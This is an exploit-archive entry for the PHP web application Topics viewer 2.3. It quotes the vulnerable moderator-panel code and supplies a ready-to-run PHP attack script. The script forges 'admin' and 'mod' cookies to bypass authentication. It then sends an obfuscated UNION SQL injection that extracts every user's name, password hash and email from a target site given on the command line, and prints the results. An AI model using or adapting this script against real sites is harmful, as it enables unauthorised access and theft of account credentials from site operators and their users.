Topics viewer <= 2.3 Authentication Bypass & SQL Injection

2012-07-01T00:00:00
ID 1337DAY-ID-18891
Type zdt
Reporter ahwak2000
Modified 2012-07-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            +-------------------------------------------------------------+
| Topics viewer <= 2.3 Authentication Bypass & SQL Injection  |
+-------------------------------------------------------------+
 
author.............: ahwak2000
mail...............: z.u5[at]hotmail[dot]com
software link......: http://nilehoster.com/default/topicsviewer
tested versions....: 2.3
date...............: 30/06/2012
---------------------------------------------------------------
in file /modcp/rmv_topic_pop.php
 
Line 16.			if (isset($_SESSION['admin']) || isset($_COOKIE['admin']) || isset($_SESSION['mod']) || isset($_COOKIE['mod']))
				{			
.
.
.
Line 38. 		if(isset ($_GET['id']))

				{
					if (!empty ($_GET['id']))
						{
						$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;"; //<---
						$result = @mysql_query ($sql);
						$topic = @mysql_fetch_array ($result);
						$verify = @mysql_num_rows ($result);
				
eXploit:
<?
print_r("
------------------------------------------------------------------
 _______          _           __      ___                        
|__   __|        (_)          \ \    / (_)                       
   | | ___  _ __  _  ___ ___   \ \  / / _  _____      _____ _ __ 
   | |/ _ \| '_ \| |/ __/ __|   \ \/ / | |/ _ \ \ /\ / / _ \ '__|
   | | (_) | |_) | | (__\__ \    \  /  | |  __/\ V  V /  __/ |   
   |_|\___/| .__/|_|\___|___/     \/   |_|\___| \_/\_/ \___|_|V2.3   
           | |                                                   
           |_| BY AHWAK2000
------------------------------------------------------------------
		   ");
if ($argc<2) {
print_r('
-----------------------------------------------------------------------------
                Usage: php '.$argv[0].' site.com/path/
-----------------------------------------------------------------------------
');

}
if ($argc > 1) {
$host=$argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email),3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");
curl_setopt($ch, CURLOPT_COOKIE, "admin=ahwak2000;mod=ahwak2000;");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$buffer = curl_exec($ch);
if(strpos($buffer,"style.css")){
echo "\n\t[-]---------------------------------------------[-]\n";
$reg  = '#<li .*>.*:(.*?)¿</span></li>#Us';
preg_match($reg,$buffer,$ahwak);
$s1=explode(",",$ahwak[1]);
$i=1;
foreach($s1 as $ayrik){
print "\n\t[$i] ".trim($ayrik)."\n";
$i++;
}
 echo "\n\t[-]---------------------------------------------[-]\n\t\t\[email protected]";
}
 
 }
?>



#  0day.today [2018-03-13]  #